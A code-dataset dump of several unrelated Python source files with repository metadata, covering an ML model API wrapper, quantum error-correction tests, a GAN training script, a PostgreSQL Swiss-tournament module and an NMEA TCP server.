"Apache-2.0"
] | null | null | null | import open3d
import torch | 13 | 13 | 0.884615 |
7901f8712e7c9a9d62614608e1db94ba004f877a | 3,488 | py | Python | a2ml/api/auger/model.py | augerai/a2ml | 9d9ce0ac1b51cc81f1cb5ae331c4523131bc6a86 | [
"Apache-2.0"
] | 30 | 2019-07-01T13:23:27.000Z | 2022-03-16T21:19:33.000Z | a2ml/api/auger/model.py | augerai/a2ml | 9d9ce0ac1b51cc81f1cb5ae331c4523131bc6a86 | [
"Apache-2.0"
] | 234 | 2019-07-04T13:56:15.000Z | 2021-11-04T10:12:55.000Z | a2ml/api/auger/model.py | augerai/a2ml | 9d9ce0ac1b51cc81f1cb5ae331c4523131bc6a86 | [
"Apache-2.0"
] | 13 | 2019-07-04T14:00:34.000Z | 2020-07-13T11:18:44.000Z | from .impl.cloud.rest_api import RestApi
from .impl.decorators import with_project
from a2ml.api.utils.decorators import error_handler, authenticated
from .impl.model import Model
from .credentials import Credentials
class AugerModel(object):
def __init__(self, ctx):
self.ctx = ctx
self.credentials = Credentials(ctx).load()
self.ctx.rest_api = RestApi(
self.credentials.api_url, self.credentials.token)
@error_handler
@authenticated
@with_project(autocreate=False)
def deploy(self, project, model_id, locally, review, name, algorithm, score, data_path, metadata=None):
model_id = Model(self.ctx, project).deploy(model_id, locally, review, name, algorithm, score, data_path, metadata)
return {'model_id': model_id}
@error_handler
@authenticated
#@with_project(autocreate=False)
def predict(self, filename, model_id, threshold, locally, data, columns, predicted_at, output,
no_features_in_result, score, score_true_data):
if locally:
self.deploy(model_id, locally, review=False, name=None, algorithm=None, score=None, data_path=None)
predicted = Model(self.ctx, project=None).predict(
filename, model_id, threshold, locally, data, columns, predicted_at, output,
no_features_in_result, score, score_true_data)
if filename:
self.ctx.log('Predictions stored in %s' % predicted)
if isinstance(predicted, dict) and 'predicted' in predicted:
return predicted
return {'predicted': predicted}
@error_handler
@authenticated
@with_project(autocreate=False)
def actuals(self, project, model_id, filename=None, data=None, columns=None, actuals_at=None, actual_date_column=None, locally=False):
return Model(self.ctx, project).actuals(model_id, filename, data, columns, actuals_at, actual_date_column, locally)
@error_handler
@authenticated
@with_project(autocreate=False)
def delete_actuals(self, project, model_id, with_predictions=False, begin_date=None, end_date=None, locally=False):
return Model(self.ctx, project).delete_actuals(model_id, with_predictions, begin_date, end_date, locally)
@error_handler
@authenticated
@with_project(autocreate=False)
def review_alert(self, project, model_id, parameters, name):
return Model(self.ctx, project).review_alert(model_id, parameters, name)
@error_handler
@authenticated
@with_project(autocreate=False)
def build_review_data(self, project, model_id, locally, output):
return Model(self.ctx, project).build_review_data(model_id, locally, output)
@error_handler
@authenticated
@with_project(autocreate=False)
def review(self, project, model_id):
return Model(self.ctx, project).review(model_id)
@error_handler
@authenticated
@with_project(autocreate=False)
def undeploy(self, project, model_id, locally):
Model(self.ctx, project).undeploy(model_id, locally)
return {'model_id': model_id}
@error_handler
@authenticated
#@with_project(autocreate=False)
def get_info(self, model_id, locally):
return Model(self.ctx, project=None).get_info(model_id, locally)
@error_handler
@authenticated
#@with_project(autocreate=False)
def update(self, model_id, metadata, locally):
return Model(self.ctx, project=None).update(model_id, metadata, locally)
| 38.32967 | 138 | 0.711869 |
6852f14a0a4865116686058f45d93848e7050de2 | 7,481 | py | Python | tests/models/test_generic_file_error_model.py | dua-arpit/qecsim | 70ded606a653fd96d517e07fbba15d9b755df752 | [
"BSD-3-Clause"
] | 35 | 2021-02-08T08:32:54.000Z | 2022-03-22T05:35:06.000Z | tests/models/test_generic_file_error_model.py | dua-arpit/qecsim | 70ded606a653fd96d517e07fbba15d9b755df752 | [
"BSD-3-Clause"
] | 2 | 2021-08-05T06:10:35.000Z | 2021-08-20T12:44:10.000Z | tests/models/test_generic_file_error_model.py | dua-arpit/qecsim | 70ded606a653fd96d517e07fbba15d9b755df752 | [
"BSD-3-Clause"
] | 7 | 2021-02-11T17:32:47.000Z | 2021-11-30T12:34:41.000Z | import math
import os
import numpy as np
import pytest
from click.testing import CliRunner # use for isolated_filesystem feature
from qecsim import app
from qecsim import paulitools as pt
from qecsim.models.basic import FiveQubitCode
from qecsim.models.generic import FileErrorModel
from qecsim.models.rotatedplanar import RotatedPlanarCode, RotatedPlanarMPSDecoder
FILES_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'test_generic_file_error_model_files')
@pytest.mark.parametrize('filename, start', [
(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 0),
(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 3),
])
def test_file_error_model_init(filename, start):
FileErrorModel(filename, start) # no error raised
@pytest.mark.parametrize('filename, start', [
(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 'blah'),
(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), -1),
(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 0.4),
(None, 0),
])
def test_file_error_model_init_invalid_parameters(filename, start):
with pytest.raises((ValueError, TypeError), match=r"^FileErrorModel") as exc_info:
FileErrorModel(filename, start) # expected error raised
print(exc_info)
@pytest.mark.parametrize('filename', [
"this_file_does_not_exist.txt",
"this_one_also.json",
"and_this_one",
])
def test_file_error_model_file_not_found(filename):
with pytest.raises(FileNotFoundError):
FileErrorModel(filename)
def test_file_error_model_init_default_parameters():
FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl')) # no error raised
def test_file_error_model_init_extra_header():
fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'))
assert fem.bias == 10
@pytest.mark.parametrize('filename', [
os.path.join(FILES_DIR, 'invalid-extra-header-1.jsonl'),
os.path.join(FILES_DIR, 'invalid-extra-header-2.jsonl'),
os.path.join(FILES_DIR, 'invalid-extra-header-3.jsonl'),
os.path.join(FILES_DIR, 'invalid-extra-header-4.jsonl'),
])
def test_file_error_model_init_invalid_extra_headers(filename):
with pytest.raises(ValueError):
FileErrorModel(filename)
def test_file_error_model_probability_distribution():
fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'))
pd = fem.probability_distribution(fem._probability)
assert isinstance(pd, tuple)
assert len(pd) == 4
assert pd[0] + pd[1] + pd[2] + pd[3] == 1
def test_file_error_model_generate():
fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'))
fqc = FiveQubitCode()
for _ in range(10):
error = fem.generate(fqc, 0.4)
assert isinstance(error, np.ndarray)
assert len(error) == 10
def test_file_error_model_generate_skip_to_start():
print()
fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 4)
fqc = FiveQubitCode()
packed_errors = (
pt.pack(fem.generate(fqc, 0.4)),
pt.pack(fem.generate(fqc, 0.4)),
pt.pack(fem.generate(fqc, 0.4)),
)
expected_packed_errors = (("8400", 10), ("5280", 10), ("1080", 10))
assert packed_errors == expected_packed_errors
@pytest.mark.parametrize('filename', [
os.path.join(FILES_DIR, 'invalid_line1.jsonl'),
os.path.join(FILES_DIR, 'invalid_line2.jsonl'),
os.path.join(FILES_DIR, 'invalid_line3.jsonl'),
os.path.join(FILES_DIR, 'repeated_dic_key.jsonl'),
os.path.join(FILES_DIR, 'invalid_structure1.jsonl'),
os.path.join(FILES_DIR, 'invalid_structure2.jsonl'),
os.path.join(FILES_DIR, 'no_prob_in_header.jsonl'),
os.path.join(FILES_DIR, 'no_label_in_header.jsonl'),
])
def test_file_error_model_invalid_file_header(filename):
with pytest.raises(ValueError):
FileErrorModel(filename)
def test_file_error_model_probability_distribution_invalid_probability_parameter():
fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'))
with pytest.raises(ValueError):
fem.probability_distribution(0.3)
def test_file_error_model__probability_distribution_no_probability_distribution_in_header():
fem = FileErrorModel(os.path.join(FILES_DIR, 'no_probability_distribution.jsonl'))
with pytest.raises(ValueError):
fem.probability_distribution(0.4)
def test_file_error_model_generate_invalid_probability_parameter():
fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'))
fqc = FiveQubitCode()
with pytest.raises(ValueError):
fem.generate(fqc, 0.3)
def test_file_error_model_generate_invalid_error_lines():
fem = FileErrorModel(os.path.join(FILES_DIR, 'header_lines_after_body_lines.jsonl'))
fqc = FiveQubitCode()
with pytest.raises(ValueError):
fem.generate(fqc, 0.4)
fem.generate(fqc, 0.4)
def test_file_error_model_generate_no_more_errors_available():
fem = FileErrorModel(os.path.join(FILES_DIR, 'no_more_errors_available.jsonl'))
fqc = FiveQubitCode()
with pytest.raises(EOFError):
fem.generate(fqc, 0.4)
fem.generate(fqc, 0.4)
fem.generate(fqc, 0.4)
def test_file_error_model_generate_no_more_errors_available_skip_to_start():
fem = FileErrorModel(os.path.join(FILES_DIR, 'no_more_errors_available.jsonl'), 1)
fqc = FiveQubitCode()
with pytest.raises(EOFError):
fem.generate(fqc, 0.4)
fem.generate(fqc, 0.4)
@pytest.mark.parametrize('filename', [
os.path.join(FILES_DIR, 'incorrect_length_in_packed_error.jsonl'),
os.path.join(FILES_DIR, 'incorrect_length_in_packed_error2.jsonl')
])
def test_file_error_model_generate_incorrect_length_in_packed_error(filename):
fem = FileErrorModel(filename)
fqc = FiveQubitCode()
with pytest.raises(ValueError):
fem.generate(fqc, 0.4)
# TESTS FOR GENERATED SAMPLES BELOW
@pytest.mark.parametrize('code, filename, decoder', [
(RotatedPlanarCode(5, 5),
os.path.join(FILES_DIR, 'rotated_planar_code_size_5_J_0.1_p_2.jsonl'),
RotatedPlanarMPSDecoder(chi=8)),
(RotatedPlanarCode(5, 5),
os.path.join(FILES_DIR, 'rotated_planar_code_size_5_J_0.1_p_4.jsonl'),
RotatedPlanarMPSDecoder(chi=8)),
(RotatedPlanarCode(5, 5),
os.path.join(FILES_DIR, 'rotated_planar_code_size_5_J_0.1_p_6.jsonl'),
RotatedPlanarMPSDecoder(chi=8)),
])
def test_file_error_model_generated_sample_error_probability(code, filename, decoder):
with CliRunner().isolated_filesystem(): # isolate from logging_qecsim.ini
# error model and probability from sample
error_model = FileErrorModel(filename, start=1000)
e_prob = error_model._probability
# runs (repeat many times to ensure physical_error_rate is close to error_probability)
max_runs = 100
data = app.run(code, error_model, decoder, e_prob, max_runs) # no error raised
p_rate = data['physical_error_rate']
p_var = data['error_weight_pvar'] / (data['n_k_d'][0] ** 2) # physical_error_rate_pvar (power of 2 is correct)
p_std = math.sqrt(p_var) # physical_error_rate_std
assert p_rate - p_std < e_prob < p_rate + p_std, (
'physical_error_rate={} is not within 1 std={} of error_probability={}'.format(p_rate, p_std, e_prob))
| 38.761658 | 119 | 0.730918 |
b9579098cdd1fea8e338f54a90889cf5d220e683 | 829 | py | Python | nlu/components/classifiers/multi_classifier/multi_classifier.py | UPbook-innovations/nlu | 2ae02ce7b6ca163f47271e98b71de109d38adefe | [
"Apache-2.0"
] | 1 | 2021-05-01T01:23:18.000Z | 2021-05-01T01:23:18.000Z | nlu/components/classifiers/multi_classifier/multi_classifier.py | sheerinZ/nlu | a223eee4b077a6b832f47e5e6125167fe0922687 | [
"Apache-2.0"
] | 2 | 2021-09-28T05:55:05.000Z | 2022-02-26T11:16:21.000Z | nlu/components/classifiers/multi_classifier/multi_classifier.py | atdavidpark/nlu | 619d07299e993323d83086c86506db71e2a139a9 | [
"Apache-2.0"
] | 1 | 2021-09-13T10:06:20.000Z | 2021-09-13T10:06:20.000Z | import nlu.pipe_components
import sparknlp
from sparknlp.annotator import *
class MultiClassifier:
@staticmethod
def get_default_model():
return MultiClassifierDLModel.pretrained() \
.setInputCols("sentence_embeddings") \
.setOutputCol("category")
@staticmethod
def get_pretrained_model(name, language):
return MultiClassifierDLModel.pretrained(name,language) \
.setInputCols("sentence_embeddings") \
.setOutputCol("multi_category")
@staticmethod
def get_default_trainable_model():
return MultiClassifierDLApproach() \
.setInputCols("sentence_embeddings") \
.setOutputCol("multi_category") \
.setLabelColumn("y") \
.setEnableOutputLogs(True) \
.setMaxEpochs(2) \
| 28.586207 | 65 | 0.652593 |
ff8b6c1575ed131d073caed9b536724f74da7cb3 | 72 | py | Python | quiz/main.py | bschandramohan/PyConnect | bfd5acc13b5fd5a83be14706032be2cf70d4d05a | [
"MIT"
] | 1 | 2021-10-11T04:34:25.000Z | 2021-10-11T04:34:25.000Z | quiz/main.py | bschandramohan/PyConnect | bfd5acc13b5fd5a83be14706032be2cf70d4d05a | [
"MIT"
] | null | null | null | quiz/main.py | bschandramohan/PyConnect | bfd5acc13b5fd5a83be14706032be2cf70d4d05a | [
"MIT"
] | null | null | null | from quiz.quiz_game import QuizGame
game = QuizGame()
game.play_game()
| 14.4 | 35 | 0.777778 |
3ee1234f52d2b19e1dbfe176ee3d32b5b789f2b8 | 5,078 | py | Python | src/gan_training.py | saattrupdan/gan | 68443884c7b4cf2527254d63145549de1f4ae525 | [
"MIT"
] | null | null | null | src/gan_training.py | saattrupdan/gan | 68443884c7b4cf2527254d63145549de1f4ae525 | [
"MIT"
] | null | null | null | src/gan_training.py | saattrupdan/gan | 68443884c7b4cf2527254d63145549de1f4ae525 | [
"MIT"
] | null | null | null | import torch
from torch import nn
from torch import optim
from torch.utils.data import DataLoader
from torch.utils.data import TensorDataset
from torch.utils.tensorboard import SummaryWriter
import itertools as it
from pathlib import Path
from tqdm.auto import tqdm
from typing import Union
import os
import time
from models import RGAN
def train_gan(gan: RGAN, dataloader: DataLoader, lr: float = 3e-4,
lr_reduction_factor: float = 1., lr_reduction_step: int = 10,
l2_reg: float = 0., optimiser: type = optim.AdamW,
epochs: Union[int, None] = None, model_name: str = 'walmart_gan',
datadir: str = '.data', random_seed: int = 42,
tensorboard_run: str = 'loss') -> RGAN:
# Set random seed
if random_seed is not None: torch.manual_seed(random_seed)
# Initialise tensorboard
    writer = SummaryWriter()
os.system('tensorboard --logdir runs &')
time.sleep(4)
# Set up optimiser and scheduler for the critic
c_optim = optimiser(gan.crt.parameters(), lr = lr)
c_sched = optim.lr_scheduler.StepLR(
c_optim,
step_size = lr_reduction_step,
gamma = lr_reduction_factor
)
# Set up optimiser and scheduler for the generator
g_optim = optimiser(gan.gen.parameters(), lr = lr)
g_sched = optim.lr_scheduler.StepLR(
g_optim,
step_size = lr_reduction_step,
gamma = lr_reduction_factor
)
epoch_it = it.count() if epochs is None else range(epochs)
for epoch in epoch_it:
avg_c_loss, avg_g_loss = 0, 0
with tqdm(total = len(dataloader) * dataloader.batch_size,
desc = f'Epoch {epoch:3}') as pbar:
for idx, reals in enumerate(dataloader):
# [batch_size, seq_len] -> [seq_len, batch_size, 1]
reals = reals[0].transpose(0, 1).unsqueeze(2)
# Get the batch size and sequence length of the batch
seq_len, batch_size, _ = reals.shape
##########################
### Train the critic ###
##########################
# Compute Wasserstein loss
c_optim.zero_grad()
noise = torch.randn_like(reals)
c_loss = torch.mean(gan(noise) - gan.crt(reals))
# Add an l2 regularisation term
                # use torch.stack so the parameter norms stay in the autograd
                # graph (building a fresh FloatTensor would detach the penalty)
                norms = torch.stack([torch.norm(p)
                                     for p in gan.crt.parameters()])
c_loss += l2_reg * (norms ** 2).sum()
# Compute average loss for logging
avg_c_loss += float(c_loss) / len(dataloader)
# Backprop gradients
c_loss.backward()
c_optim.step()
#############################
### Train the generator ###
#############################
# Compute Wasserstein loss
g_optim.zero_grad()
noise = torch.randn_like(reals)
g_loss = -torch.mean(gan(noise))
# Compute average loss for logging
avg_g_loss += float(g_loss) / len(dataloader)
# Backprop gradients
g_loss.backward()
g_optim.step()
# Update progress bar
pbar.update(dataloader.batch_size)
# Add to tensorboard
metrics = {'gen': float(g_loss), 'crt': float(c_loss)}
niter = epoch * len(dataloader) + (idx + 1)
writer.add_scalars(tensorboard_run, metrics, niter)
# Update learning rate schedulers
c_sched.step()
g_sched.step()
# Logging
pbar.set_description(\
f'Epoch {epoch:3} - '\
f'crt_loss {avg_c_loss:.3f} - '\
f'gen_loss {avg_g_loss:.3f}'
)
# Save model
path = Path.cwd().parent / datadir / f'{model_name}.zip'
scripted_gan = torch.jit.script(gan)
scripted_gan.save(str(path))
writer.close()
    os.system('killall -9 tensorboard')
    # hand the trained model back, as the RGAN return annotation promises
    return gan
if __name__ == '__main__':
from data_prep import load_hdf
import matplotlib.pyplot as plt
hdf = load_hdf()
X = torch.FloatTensor(hdf['X'])
dataset = TensorDataset(X)
dataloader = DataLoader(dataset, batch_size = 32, shuffle = True)
SEED = 42
gan = RGAN(gen_dim = 256, crt_dim = 64, random_seed = SEED)
train_gan(gan, dataloader, random_seed = SEED)#, l2_reg = 0.1,
#lr_reduction_factor = 0.9, lr_reduction_step = 10)
#with torch.no_grad():
# gan = torch.jit.load('../.data/walmart_gan.zip')
# noise = torch.randn(143, 10, 1)
# fakes = gan(noise).squeeze().transpose(0, 1)
#rnds = torch.randint(0, X.size(0), (10,))
#reals = X[rnds, :]
#xs = torch.arange(X.shape[1])
#plt.figure(figsize = (10, 5))
#for real in reals:
# plt.plot(xs, real)
#plt.show()
#for fake in fakes:
# plt.plot(xs, fake)
# plt.show()
| 31.153374 | 70 | 0.553564 |
3ac6e2c853542d474ca9657e6b4eb7cb2c6c0546 | 10,312 | py | Python | tournament/tournament.py | singh-pratyush96/tournament-udacity | de895cf00b4799fe4193f38c30d8e0501fd95b68 | [
"MIT"
] | null | null | null | tournament/tournament.py | singh-pratyush96/tournament-udacity | de895cf00b4799fe4193f38c30d8e0501fd95b68 | [
"MIT"
] | null | null | null | tournament/tournament.py | singh-pratyush96/tournament-udacity | de895cf00b4799fe4193f38c30d8e0501fd95b68 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# tournament.py -- implementation of a Swiss-system tournament
#
import psycopg2
from random import shuffle
def connect():
"""
Connect to the PostgreSQL database.
Returns a database connection and corresponding cursor.
"""
connection = psycopg2.connect("dbname=tournament")
cursor = connection.cursor()
return connection, cursor
def existsPlayer(pid):
"""
Check if a player exists
Args:
pid: Player ID
Returns: Status
"""
conn, cur = connect()
sql = 'select count(*) from players where pid = %s;'
cur.execute(sql, (pid,))
result = cur.fetchall()[0][0] == 1
conn.close()
return result
def existsTournament(tournamentid):
"""
Check if a tournament exists
Args:
tournamentid: Tournament ID
Returns: Status
"""
conn, cur = connect()
sql = 'select count(*) from tournaments where tid = %s;'
cur.execute(sql, (tournamentid,))
result = cur.fetchall()[0][0] == 1
conn.close()
return result
def existsTournamentPlayer(tournamentid, pid):
"""
Check if a player is registered for a tournament
Args:
tournamentid: Tournament ID
pid: Player ID
Returns: Status
"""
conn, cur = connect()
sql = 'select count(*) from tournamentplayers where tid = %s and pid = %s;'
cur.execute(sql, (tournamentid, pid))
result = cur.fetchall()[0][0] == 1
conn.close()
return result
def deleteMatches(tournamentid=-1):
"""
Remove all the match records from the database for a tournament.
If no argument is passed, delete all matches from all tournament.
Args:
tournamentid (int): ID of tournament of which matches are to be cleared
If no argument passed, reset all matches
Returns: Status
"""
conn, cur = connect()
if tournamentid == -1: # If no argument passed
sql = 'update tournamentplayers set wins = DEFAULT,' \
' matches = DEFAULT, lastoppid = default;'
cur.execute(sql)
else:
if not existsTournament(tournamentid):
conn.close()
return False
sql = 'update tournamentplayers set wins = DEFAULT,' \
' matches = DEFAULT, lastoppid = default where tid = %s;'
cur.execute(sql, (tournamentid,))
conn.commit()
conn.close()
return True
def deleteTournamentPlayers(tournamentid=-1):
"""
Remove all the player records from the database.
Args:
tournamentid (int): Tournament ID of which players are to be deleted.
If no argument passed, delete for all tournaments
Returns: Status
"""
conn, cur = connect()
    if tournamentid == -1:  # If no argument passed
        sql = 'delete from tournamentplayers;'
        cur.execute(sql)
    else:
        if not existsTournament(tournamentid):
            conn.close()
            return False
        sql = 'delete from tournamentplayers where tid = %s;'
        cur.execute(sql, (tournamentid,))
conn.commit()
conn.close()
return True
def countTournamentPlayers(tournamentid=-1):
"""Returns the number of players currently registered.
Args:
tournamentid (int): Tournament ID to count players.
If no argument, count players participated in any
tournament
Returns: Status, count of players
"""
conn, cur = connect()
# Get count of rows in player relation
if tournamentid == -1:
sql = 'select count(distinct pid) from tournamentplayers;'
cur.execute(sql)
else:
if not existsTournament(tournamentid):
conn.close()
return False, -1
sql = 'select count(distinct pid) from tournamentplayers ' \
'where tid = %s;'
cur.execute(sql, (tournamentid,))
player_count = cur.fetchall()[0][0]
conn.close()
return True, player_count
def playerCount():
"""
Count all players, whether registered or not
Returns: Number of players
"""
conn, cur = connect()
sql = 'select count(*) from players;'
cur.execute(sql)
count = cur.fetchall()[0][0]
conn.close()
return count
def registerPlayer(name):
"""Adds a player to the tournament database.
The database assigns a unique serial id number for the player. (This
should be handled by your SQL database schema, not in your Python code.)
Args:
name: the player's full name (need not be unique).
Returns: ID of registered player
"""
conn, cur = connect()
sql = 'insert into players (pname) values (%s) returning pid;'
cur.execute(sql, (name,))
pid = cur.fetchall()[0][0]
conn.commit()
conn.close()
return pid
def playerStandings(tournamentid=-1):
"""Returns a list of the players and their win records, sorted by wins.
The first entry in the list should be the player in first place, or a player
tied for first place if there is currently a tie.
Returns:
A list of tuples, each of which contains (id, name, wins, matches):
id: the player's unique id (assigned by the database)
name: the player's full name (as registered)
wins: the number of matches the player has won
matches: the number of matches the player has played
Returns: Status, list of tuples
"""
conn, cur = connect()
if tournamentid == -1:
sql = 'select * from all_tournament_player_stats;'
cur.execute(sql)
list1 = cur.fetchall()
else:
if not existsTournament(tournamentid):
conn.close()
return False, []
sql = 'select pid, pname, wins, matches from tournament_players_stats' \
' where tid = %s;'
cur.execute(sql, (tournamentid,))
list1 = cur.fetchall()
conn.close()
return True, list1
def clearPlayers():
"""
Delete all players
"""
conn, cur = connect()
sql = 'delete from players; delete from tournamentplayers;'
cur.execute(sql)
conn.commit()
conn.close()
def reportMatch(tournamentid, winner, loser):
"""
Report result of match. winner and loser are same
in case of a 'bye'
Args:
tournamentid: Tournament ID
winner: Winner ID
loser: Loser ID
Returns: Status
"""
conn, cur = connect()
if not existsTournamentPlayer(tournamentid, winner) or \
not existsTournamentPlayer(tournamentid, loser):
conn.close()
return False
sql = 'update tournamentplayers set matches = matches + 1,' \
' wins = wins + 1, lastoppid = %s where tid = %s and pid = %s;'
cur.execute(sql, (loser, tournamentid, winner))
if winner != loser: # If not a bye
sql = 'update tournamentplayers set matches = matches + 1,' \
' lastoppid = %s where tid = %s and pid = %s;'
cur.execute(sql, (winner, tournamentid, loser))
conn.commit()
    conn.close()
    return True
def swissPairings(tournamentid):
"""
Returns a list of pairs of players for the next round of a match.
Assuming that there are an even number of players registered, each player
appears exactly once in the pairings. Each player is paired with another
player with an equal or nearly-equal win record, that is, a player adjacent
to him or her in the standings.
Returns:
A list of tuples, each of which contains (id1, name1, id2, name2)
id1: the first player's unique id
name1: the first player's name
id2: the second player's unique id
name2: the second player's name
"""
conn, cur = connect()
sql = 'select pid, pname, lastoppid from tournament_players_stats' \
' where tid = %s;'
cur.execute(sql, (tournamentid,))
players = cur.fetchall()
# Odd players, bye one who wasn't byed last time
if len(players) % 2 == 1:
tempList = list(players)
shuffle(tempList)
byed = False
randomFirst = tempList[0]
while not byed and len(tempList) > 0:
if tempList[0][0] == tempList[0][2]:
players.remove(tempList[0])
reportMatch(tournamentid, tempList[0][0], tempList[0][0])
byed = True
tempList.remove(tempList[0])
if not byed:
reportMatch(tournamentid, randomFirst[0], randomFirst[0])
players.remove(randomFirst)
# Arrange players, no rematch
pairs = []
    while len(players) > 2:  # an even number of players remains at this point
player1 = players[0]
player2 = players[1]
if player1[2] == player2[0]:
player2 = players[2]
players.remove(player1)
players.remove(player2)
pairs.append((player1[0], player1[1], player2[0], player2[1]))
# Add remaining two players
pairs.append((players[0][0], players[0][1], players[1][0], players[1][1]))
conn.close()
return pairs
def addTournament(name):
"""
Register a new tournament
Args:
name: Name of tournament
Returns:
ID of tournament added
"""
conn, cur = connect()
sql = 'insert into tournaments (tname) values(%s) returning tid;'
cur.execute(sql, (name,))
tid = cur.fetchall()[0][0]
conn.commit()
conn.close()
return tid
def addPlayerTournament(tid, pid):
"""
Add a registered player to a tournament
Args:
tid: Tournament ID
pid: Player ID
Returns: Status
"""
if not existsTournament(tid) or not existsPlayer(pid):
return False
conn, cur = connect()
sql = 'insert into tournamentplayers (tid, pid) values (%s, %s);'
cur.execute(sql, (tid, pid))
conn.commit()
conn.close()
return True
def countTournaments():
"""
Count number of tournaments
Returns: Number of tournaments
"""
conn, cur = connect()
sql = 'select count(*) from tournaments;'
cur.execute(sql)
count = cur.fetchall()[0][0]
conn.close()
return count
def clearTournaments():
"""
Delete all tournaments
"""
conn, cur = connect()
sql = 'delete from tournamentplayers; delete from tournaments;'
cur.execute(sql)
conn.commit()
conn.close() | 25.715711 | 80 | 0.610357 |
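# Hedged usage sketch (illustration only, not part of the original module).
# It assumes the expected "tournament" PostgreSQL database and schema are in
# place; the player names and winner choices below are invented.
def exampleSwissRound():
    """Run one example round: register, pair, report, and show standings."""
    tid = addTournament("Example Open")
    for name in ("Alice", "Bob", "Carol", "Dave"):
        addPlayerTournament(tid, registerPlayer(name))
    for id1, name1, id2, name2 in swissPairings(tid):
        # arbitrarily report the first player of each pair as the winner
        reportMatch(tid, id1, id2)
    return playerStandings(tid)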
b58cc492945714d0d8b1ebe20efb2cf75f90fb40 | 3,032 | py | Python | src/vanchor/devices/nmea_net.py | AlexAsplund/Vanchor | cb5d1c95567ab9d9bd280e2ca3022e4a2da1fa67 | [
"MIT"
] | 12 | 2021-09-25T01:03:31.000Z | 2022-02-04T09:13:00.000Z | src/vanchor/devices/nmea_net.py | AlexAsplund/Vanchor | cb5d1c95567ab9d9bd280e2ca3022e4a2da1fa67 | [
"MIT"
] | 13 | 2021-09-20T19:56:50.000Z | 2022-01-10T13:08:32.000Z | src/vanchor/devices/nmea_net.py | AlexAsplund/Vanchor | cb5d1c95567ab9d9bd280e2ca3022e4a2da1fa67 | [
"MIT"
] | 1 | 2021-10-05T10:49:59.000Z | 2021-10-05T10:49:59.000Z | import socketserver
from threading import Thread
class NmeaNet:
def __init__(self, main):
self.main = main
self.logger = main.logging.getLogger(self.__class__.__name__)
self.emitter = main.event.emitter
self.main.work_manager.start_worker(self.start)
def start(self, main):
self.logger.info("Starting NmeaNet server")
host = "0.0.0.0"
port = 10000
self.server = NmeaNetServer((host, port), NmeaTCPHandler, nmea_net=self)
self.server.serve_forever()
class NmeaTCPHandler(socketserver.BaseRequestHandler):
def __init__(self, nmea_net, *args, **kwargs):
self.main = nmea_net.main
self.logger = self.main.logging.getLogger(self.__class__.__name__)
self.emitter = self.main.event.emitter
super().__init__(*args, **kwargs)
def send_event(self, message):
self.logger.info("Sending NMEA")
msg = message[0]
self.request.sendall(bytes(msg, "utf-8"))
def handle(self):
while 1:
try:
rec = self.request.recv(1024)
try:
self.data = rec.decode("ascii")
except:
self.data = rec.decode("utf-8")
                self.data = self.data.replace("\r\n", "")
if self.data and self.data[0] == "$":
self.logger.info("Sending raw NMEA message: {}".format(self.data))
self.emitter.emit("nmea.parse", self.data)
elif self.data == "" or self.data == "\r\n":
None
else:
self.logger.info(
"Invalid data received: {} | {}".format(self.data, rec)
)
self.request.sendall(bytes(f"ERROR: Invalid data\r\n", "ascii"))
except Exception as e:
self.logger.warning("Failed to process message", e)
def finish(self):
self.logger.debug("{}".format(self.client_address))
return socketserver.BaseRequestHandler.finish(self)
class NmeaNetServer(socketserver.TCPServer):
def __init__(self, *args, nmea_net, **kwargs):
super().__init__(*args, **kwargs)
self.nmea_net = nmea_net
self.main = nmea_net.main
self.logger = self.main.logging.getLogger(self.__class__.__name__)
self.emitter = self.main.event.emitter
def finish_request(self, request, client_address):
"""Finish one request by instantiating RequestHandlerClass."""
self.logger.info("{} request finished".format(client_address[0]))
self.RequestHandlerClass(self.nmea_net, request, client_address, self)
def verify_request(self, request, client_address):
self.logger.debug("verify_request(%s, %s)", request, client_address)
return socketserver.TCPServer.verify_request(
self,
request,
client_address,
)
| 36.095238 | 87 | 0.573219 |
f4eaa4061bfed62c1da74b49767bf9af46595249 | 12,597 | py | Python | pyglet/media/instrumentation.py | SwineProject/pyglet | f0203870bef94d4349ad16f060c941d45270a0b5 | [
"BSD-3-Clause"
] | null | null | null | pyglet/media/instrumentation.py | SwineProject/pyglet | f0203870bef94d4349ad16f060c941d45270a0b5 | [
"BSD-3-Clause"
] | null | null | null | pyglet/media/instrumentation.py | SwineProject/pyglet | f0203870bef94d4349ad16f060c941d45270a0b5 | [
"BSD-3-Clause"
] | null | null | null | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2018 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
